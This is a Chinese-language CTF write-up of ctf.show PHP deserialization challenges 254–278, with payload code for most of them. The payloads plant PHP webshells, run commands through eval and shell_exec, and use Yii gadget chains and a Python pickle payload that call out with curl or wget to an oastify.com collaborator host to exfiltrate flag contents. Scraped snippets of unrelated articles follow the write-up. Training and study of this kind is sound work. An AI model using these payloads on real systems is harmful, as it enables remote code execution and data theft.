ctf_show笔记篇(web入门---反序列化)

目录

 反序列化

254:无用,是让熟悉序列化这个东西的

255:直接使$isVip=true

256:还是使用变量覆盖

257:开始使用魔法函数

258:将序列化最前面的过滤了,使用+绕过

259:  这一题需要看writeup才知道,  这个类里面还设置了一个__call函数,  里面写了调用SoapClient原生类,  存在ssrf

260:  直接传就可以

261:  构造pop链

262:  两种解法1.非预期解法.  2.字符串逃逸

263:  注意,这里通过inc/inc.php保存的文件在inc下

264:  和262差不多

265:  

266:  两种方式1.利用大小写绕过2.利用php处理畸形字符串的容错机制

方法1

方法2

##从这里开始后面的大多数都是框架漏洞,版本漏洞这些,去网上找nday或者链子这些啊就能做,如果想深入研究需要自行查找资料了

267:  yii web框架反序列化漏洞

268:  都是一样的框架,只是pop链改变点

269-270:这里推荐使用phpggc脚本

271-273:也同样是用phpggc直接做的

274:同样可以用phpgcc工具,只是需要base64加密一下

275:容易被误导

276:  

277-278:  这一题利用的是python的反序列化


 反序列化

254:无用,是让熟悉序列化这个东西的

255:直接使$isVip=true

<?php
class ctfShowUser{
    public $isVip=true;
}
$a = serialize(new ctfShowUser);
echo urlencode($a);
?>

256:还是使用变量覆盖

<?php
class ctfShowUser{
    public $username='a';
    public $password='xxxxxx';
    public $isVip=true;
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?>

257:开始使用魔法函数

__construct:当使用new实例化一个对象时调用

<?php

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}
class backDoor{
    private $code='system("cat ./flag.php");';
    public function getInfo(){
        eval($this->code);
    }
}
echo(urlencode(serialize(new ctfShowUser())));
?>

258:将序列化最前面的过滤了,使用+绕过

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'backDoor';

    public function __construct(){
        $this->class=new backDoor();
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}
class backDoor{
    public $code="system('cat flag.php');";
    public function getInfo(){
        eval($this->code);
    }
}
$a = serialize(new ctfShowUser());
echo(urlencode(str_replace('O:','O:+',$a)));
?>

259:  这一题需要看writeup才知道,  这个类里面还设置了一个__call函数,  里面写了调用SoapClient原生类,  存在ssrf

__call是一个魔法函数,  当调用不存在的参数或者函数就会去调用

SoapClient原生类,  类似于curl一样的存在,  基于 XML 的协议,它使应用程序通过 HTTP 来交换信息

从代码上看直接访问flag.php给X_FORWARDED_FOR赋值127.0.0.1三次(127.0.0.1,  127.0.0.1,  127.0.0.1)就可以绕过array_pop(删除数组末尾的值),  在传入token等于ctfshow就能得到flag

flag.php

$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);


if($ip!=='127.0.0.1'){
	die('error');
}else{
	$token = $_POST['token'];
	if($token=='ctfshow'){
		file_put_contents('flag.txt',$flag);
	}
}

但是有问题,  去查询了才知道开启了Cloudflare代理( 大致意思就是,  无论传入什么ip都会指向cloudflare对应的服务器IP )

只能通过SoapClient原生类的反序列化来做

我的理解呢就是传入数据包(这时还是用的是代理的ip),  服务器解析数据包解析反序列化(这时已经进去服务器了,  在服务器里运行),  通过SoapClient原生类再重新传一次给自己的包,  这时就是从内部访问了,  代理就不会去将 HTTP 代理的 IP 地址附加到这个数据包的标头

一般的php是不会自带soap的

查看一下当前php版本再安装指定版本的soap

从下图框起来的地方看,  user-agent是可以操控的

<?php
//token=ctfshow
$client = new SoapClient(null,array('uri'=>'127.0.0.1','location'=>'http://127.0.0.1:1234'));
$client->getFlag();
?>

poc:

<?php

$ua="test\r\nX-Forwarded-For:127.0.0.1,127.0.0.1,127.0.0.1\r\nContent-Type:application/x-www-form-urlencoded\r\nContent-Length: 13\r\n\r\ntoken=ctfshow";

$client=new SoapClient(null,array('uri'=>'127.0.0.1','location'=>'http://127.0.0.1:9999/flag.php','user_agent'=>$ua));

$client->AAA();
//echo urlencode(serialize($client));
?>

260:  直接传就可以

261:  构造pop链

这里需要学到一个新的知识点

所以这里就可以利用到__unserialize函数

  1. 利用file_put_contents($this->username, $this->password);写入shell最后

  2. 而__sleep可以不用管,  只有执行serialize才会执行

  3. 0x36d十进制就等于877,  所以不管你再文件名用887还是再shell里加一个887都无所谓

poc:

<?php
class ctfshowvip{
	public $username;
	public $password;
	public function __construct($u,$p){
		$this->username=$u;
		$this->password=$p;
	}
}
echo urlencode(serialize(new ctfshowvip('877.php','<?php eval($_GET[a]) ?>')));

262:  两种解法1.非预期解法.  2.字符串逃逸

先说第一种

首先从hint上有提示message.php,  访问能看到

那么从这里就能得到一种非预期解法

直接给网站存储再本地的cookie添加一个base64编码的构造好的序列化字符串

再去添加cookie

这就是第一种非预期解

现在讲第二种,  字符串逃逸

大致来说呢,  就是传入fuck就会变成loveU这时就会多出一位

例如:

{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"fuck";s:5:"token";s:4:"user";}

而fuck变成了loveU,  这时多出了一位,  而多出的一位就会被挤出去

{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"loveU";s:5:"token";s:4:"user";

利用这个原理来写poc

";s:5:"token";s:5:"admin";}我们最后是需要让这个在里面,  把;s:5:"token";s:4:"user";}挤出去,  所以需要构造27个fuck

'fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';

f=1
m=2
t='fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';

263:  注意,这里通过inc/inc.php保存的文件在inc下

这里涉及一个新知识点:

php的session信息是储存在文件中的

session.save_handler="" 指定储存时使用的函数(默认是file)

但是当在页面设置时使用ini_set更改了值并且与默认的不同,  那么就会出现问题

这时,  如果传入一个|O:5:"Class"类似于这样的序列化,  php就会自动把|前面的当作键名用,  反而会反序列化|后的值

  • php_binary 键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值
  • php 键名+竖线(|)+经过serialize()函数处理过的值
  • php_serialize 经过serialize()函数处理过的值,会将键名和值当作一个数组序列化

这一题就出现了此问题

现在去找session接受点

这里能看到当limit小于5时,  他会直接去拿存储在cookie里的limit(当然是会base64解密的)

所以构造好以后可以在本地cookie里插入

现在找注入点

在inc.php里,  可以利用file_put_contents写入文件漏洞,  刚好可以构造一个poc

而inc.php又存在上面说的问题

session.save_handler=""于user.ini默认设置不符,  会反序列化session中|后的数据所以

payload:  

<?php
class User{
    public $username = '1.php';
    public $password = '<?php eval($_POST[a]);?>';
}

echo urlencode(base64_encode("|".serialize(new User)));

264:  和262差不多

265:  

php的特性,  按地址传参

例如$a = 1    $b = 2,  这时让$b = &$a,  再给$a 重新赋个值 $a = 3,  这个时候$b就会一直跟着$a变化,  $a是什么$b就是什么

payload:

<?php
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
}

$a = new ctfshowAdmin('','');
$a->password = &$a->token;

echo urlencode(serialize($a));

266:  两种方式1.利用大小写绕过2.利用php处理畸形字符串的容错机制

从代码来看

  1. 用cs接收file_get_contents读取的传输的参数,  利用的是php://input伪协议
  2. 最后是需要执行到这个函数才行,  但是执行这个函数的条件是对象被销毁(也就是脚本结束后才会执行),  但是因为这里有这么一个函数会抛出异常导致无法立即执行destruct

方法1

,  大小写绕过


不知道是不是php似乎对类的名字大小写不敏感还是怎么回事,  可以传入Ctfshow进行绕过

payload:

<?php
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
}

$a = new ctfshow;

echo urlencode(serialize($a));
O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

方法2

利用php处理畸形的序列化的处理措施,  当php收到畸形的序列化时,  会因为对此序列化的不放心,  会第一时间处理掉它,  所以能直接让处理他的顺序排在了最前面

  1. 直接将最后的序列化后的}去掉
    O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";
  2. 或者修改属性个数有点类似于绕过__wakeup魔法函数
    O:7:"ctfshow":3:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
  3. 反正就是让他变得畸形就可以,  可以自主尝试一下
    O:7:"ctfshow":3:{abc}


##从这里开始后面的大多数都是框架漏洞,版本漏洞这些,去网上找nday或者链子这些啊就能做,如果想深入研究需要自行查找资料了

267:  yii web框架反序列化漏洞

拿到题以后从wappalyzer插件来看,是yii框架

存在登录点

知道是yii框架的,直接去搜yii框架默认账户密码,或者直接尝试弱口令也行

账户:admin

密码:admin

登陆以后在about页面查看元代码发现有

拼接在url上发现爆出了反序列化的位置以及接入点还有编码编码

已经知道是yii框架了,直接去搜yii框架反序列化利用链,(找反序列化只有两种方法,1day或者nday,不然就只有代码审计)

此题设置了非调试模式的生产环境运行方式,用system之类的函数无回显,所以利用dnslog的方式将数据传输回来,或者是直接cp flag文件到另一个文件,然后去访问也行

<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'shell_exec';
            $this->id = 'curl -X POST -F a=`echo $PWD` 8pyk4oeb2c9codjxfyvclxip7gd710pp.oastify.com';				//命令执行
        }
    }
}
namespace Faker {

    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            $this->formatters['close'] = [new IndexAction(), 'run'];
        }
    }
}
namespace yii\db{

    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader=new Generator();
        }
    }
}
namespace{

    use yii\db\BatchQueryResult;

    echo base64_encode(serialize(new BatchQueryResult()));
}

这里利用burpsuit的collaborator

首先这里先获得了web的根目录

再通过写入webshell的方式

<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'shell_exec';
            $this->id = 'echo \'<?php eval(\$_POST[a]);>\' > /var/www/html/basic/web/1.php';				//命令执行
        }
    }
}
namespace Faker {

    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            $this->formatters['close'] = [new IndexAction(), 'run'];
        }
    }
}
namespace yii\db{

    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader=new Generator();
        }
    }
}
namespace{

    use yii\db\BatchQueryResult;

    echo base64_encode(serialize(new BatchQueryResult()));
}

268:  都是一样的框架,只是pop链改变点

<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'exec';
            $this->id = 'cp /f* 1.txt';
        }
    }
}
namespace Faker {

    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            $this->formatters['isRunning'] = [new IndexAction(), 'run'];
        }
    }
}
namespace Codeception\Extension{

    use Faker\Generator;

    class RunProcess
    {
        private $processes = [];
        public function __construct(){
            $this->processes[]=new Generator();
        }
    }
}
namespace{


    use Codeception\Extension\RunProcess;

    echo base64_encode(serialize(new RunProcess()));
}

269-270:这里推荐使用phpggc脚本

大多数的php反序列化都有集成的poc,并且标明了漏洞版本,以及利用点

271-273:也同样是用phpggc直接做的

例如这几题都是用的laravel框架

如果实在利用不了可以去网上搜pop链

274:同样可以用phpgcc工具,只是需要base64加密一下

275:容易被误导

  1. filter类里有三个函数
  2. __construct将实例化时传入的两个值赋给filename和filecontent
  3. checkevil检查俩参数有没有php和flag大小写匹配
  4. __destruct当销毁时执行,用于删除,这里存在着绕过执行

我的第一想法其实时条件竞争,  在unlink函数没执行时访问file_out_contents写入的文件, 

$_SERVER['DOCUMENT_ROOT']:  返回网站根目录

但是我发现似乎这里的rm可以用 ; 隔断在执行一个新命令

payload:

?fn=php;ls

传入php让$this->evilfile=true,  然后用; 执行两个命令成功rce

276:  

277-278:  这一题利用的是python的反序列化

想要详细了解可以看pickle反序列化初探 - 先知社区 (aliyun.com)

利用reduce来执行命令

poc:  这里利用dnslog带外拿flag

import base64
import pickle
import os


class shell(object):
    def __reduce__(self):
        return (os.popen, ('wget go8p4bjno27m32col7ek2iexcoif66uv.oastify.com?a=`cat fla*`',))


k = shell()
print(base64.b64encode(pickle.dumps(k)))

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/471261.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

用css滤镜做颜色不同的数据卡片(背景图对于css滤镜的使用)

<template> <div class"xx_modal_maincon"><div class"xx_model_bt">履约起始日至计算日配额及履约情况</div><el-row><el-col :span"6"><div class"xx_modal_mod"><div class"mod…

cs推免相关文书模板、基本资料

目录 复试问题 文书模板 机考指南 链接:https://pan.baidu.com/s/1WAAzTPZsASNDt5XRmAO9VA?pwd=21yk 提取码:21yk --来自百度网盘超级会员V5的分享 408专业课复习 链接:https://pan.baidu.com/s/1UI0EwWTy3zn3lm3wTQJ2Dw?pwd=t5gj 提取码:t5gj --来自百度网盘超级会…

【技术栈】Redis 中的事务及持久化方式

SueWakeup 个人主页&#xff1a; SueWakeup 系列专栏&#xff1a;学习技术栈 个性签名&#xff1a;保留赤子之心也许是种幸运吧 本文封面由 凯楠&#x1f4f8; 友情提供 目录 相关传送门 1. Redis 中的事务 2. Redis 持久化 2.1 RDB 方式 2.1.1 RDB手动 2.1.2 RDB自动 2.…

LeetCode:2684. 矩阵中移动的最大次数(DP Java)

目录 2684. 矩阵中移动的最大次数 题目描述&#xff1a; 实现代码与解析&#xff1a; DP 原理思路&#xff1a; 2684. 矩阵中移动的最大次数 题目描述&#xff1a; 给你一个下标从 0 开始、大小为 m x n 的矩阵 grid &#xff0c;矩阵由若干 正 整数组成。 你可以从矩阵第…

C++第八弹---类与对象(五)

✨个人主页&#xff1a; 熬夜学编程的小林 &#x1f497;系列专栏&#xff1a; 【C语言详解】 【数据结构详解】【C详解】 目录 1、运算符重载 1.1、赋值运算符重载 1.2、前置和后置重载 2、const成员 3、取地址及const取地址操作符重载 总结 1、运算符重载 1.1、赋值运…

MathType注册码永久激活版2024中文版

1、 点击exe的安装包&#xff0c;然后像普通软件一样安装即可&#xff0c;路径选择你可以找到的&#xff08;后面设置会用到&#xff09; 2、安装完成之后&#xff0c;不要打开!不要打开!不要打开!这一步很重要!!!安装之后&#xff0c;打开激活工具&#xff08;激活工具&#x…

Spring之@Autowired注解

Autowired的几种用法 作用在属性上作用在方法上作用在构造器上 demo演示 创建三个普通bean Component public class ComponentA { }Component public class ComponentB { }Component public class ComponentC { } 依赖注入 package com.test.model.component;import org.…

Spring学习记录之依赖注入

问题1&#xff1a; 往一个类中传递数据的方式有哪些呢&#xff0c;其实&#xff0c;只有一种方式&#xff0c;即通过方法&#xff0c;但方法却有多种&#xff0c;一种是我们先前学到的通过set方法&#xff08;普通方法&#xff09;&#xff0c;另一种则是通过构造方法的方式。…

3.19作业

1、思维导图 2、模拟面试题 1&#xff09;TCP通信中的三次握手和四次挥手 答&#xff1a;三次握手 客户端向服务器发送连接请求 服务器向客户端回复应答并向客户端发送连接请求 客户端回复服务端&#xff0c;并建立联系 四次挥手 进程a向进程b发送断开连接请求…

单例设计模式,各种排序复习

1.单例设计模式 资料来源 1.1单例模式是什么&#xff1f; 单例模式&#xff0c;属于创建类型的一种常用的软件设计模式。 通过单例模式的方法创建的类在当前进程中只有一个实例&#xff08;根据需要&#xff0c;也有可能一个线程中属于单例&#xff0c;如&#xff1a;仅线程…

qt Qt Remote Object(QtRO)实现进程间通信

简介 Qt Remote Object简称QtRO&#xff0c;这是Qt5.9以后官方推出来的新模块&#xff0c;专门用于进程间通信&#xff08;IPC&#xff09;。是基于Socket来封装的&#xff0c;兼容LPC和RPC。LPC即Local Process Communication&#xff0c;而RPC是指Remote Process Communicat…

瑞士百达资产管理有限公司拟增三大去中心化数字加密货币支付接口!

简介: 瑞士百达集团成立于1805年,欧洲第三大财富管理公司, 集团拥有约 5,300 名员工,其中包括 900 名投资经理。它在金融服务中心拥有 30 个办事处网络,包括在日内瓦、卢森堡、拿骚、香港和新加坡的注册银行,百达集团管理的资产总额达6380亿瑞士法郎(7670亿美元)。 瑞士百达资…

触手可及的社交:揭示Facebook如何让每个人都能参与其中

引言 在当今社会&#xff0c;Facebook已经成为了人们日常生活中不可或缺的一部分。无论是与朋友、家人保持联系&#xff0c;还是参与社群讨论、获取新闻信息&#xff0c;Facebook都提供了一个触手可及的社交平台。本文将探讨Facebook如何让每个人都能轻松参与其中&#xff0c;…

ClickHouse01-什么是ClickHouse

什么是ClickHouse&#xff1f; 关于发展历史存在的优势与劣势什么是它风靡的原因&#xff1f; 什么是ClickHouse&#xff1f; 官方给出的回答是&#xff0c;它是一个高性能、列式存储、基于SQL、供在线分析处理的数据库管理系统 当然这边不得不提到OLAP(Online Analytical Pr…

代码随想录day24(1)二叉树:最大二叉树(leetcode654)

题目要求&#xff1a; 给定一个不含重复元素的整数数组。一个以此数组构建的最大二叉树定义如下&#xff1a; 二叉树的根是数组中的最大元素。左子树是通过数组中最大值左边部分构造出的最大二叉树。右子树是通过数组中最大值右边部分构造出的最大二叉树。 通过给定的数组构…

【C++】AVL树的两单旋和两双旋

目录 1. 新节点插入较高左子树的左侧---左左&#xff1a;右单旋 代码 2. 新节点插入较高右子树的右侧---右右&#xff1a;左单旋 代码 3. 新节点插入较高左子树的右侧---左右&#xff1a;先左单旋再右单旋 ​编辑 代码 4. 新节点插入较高右子树的左侧---右左&#xff1a;先…

如何选择适合大功率直流电子负载

选择适合大功率直流电子负载时&#xff0c;需要考虑以下几个关键因素&#xff1a; 功率范围&#xff1a;首先&#xff0c;需要确定所需的最大功率范围。大功率直流电子负载通常有不同的功率等级&#xff0c;如1kW、2kW、5kW等。根据实际应用场景和需求&#xff0c;选择合适的功…

CTF题型 php反序列化进阶(1) php原生类 例题和总结

CTF题型 php反序列化进阶(1) php原生文件操作类 例题和总结 文章目录 CTF题型 php反序列化进阶(1) php原生文件操作类 例题和总结特征原理 我们可以通过PHP自身本来就有的类来进行文件操作扫描目录的三个类DirectoryIterator(支持glob://协议)FilesystemIterator&#xff08;继…

基于springboot的stone音乐播放器的设计与实现

摘 要 随着我国经济的高速发展与人们生活水平的日益提高&#xff0c;人们对生活质量的追求也多种多样。尤其在人们生活节奏不断加快的当下&#xff0c;人们更趋向于足不出户解决生活上的问题&#xff0c;stone音乐播放器展现了其蓬勃生命力和广阔的前景。与此同时&#xff0c;…

使用 CSS 实现毛玻璃效果

在现代 Web 设计中,毛玻璃效果越来越受欢迎。它能够让界面元素看起来更加柔和、朦胧,同时又不会完全遮挡背景内容,给人一种透明而又不失质感的视觉体验。虽然过去实现这种效果需要借助图像编辑软件,但现在只需要几行 CSS 代码,就可以在网页上呈现出令人惊艳的毛玻璃效果。 使用…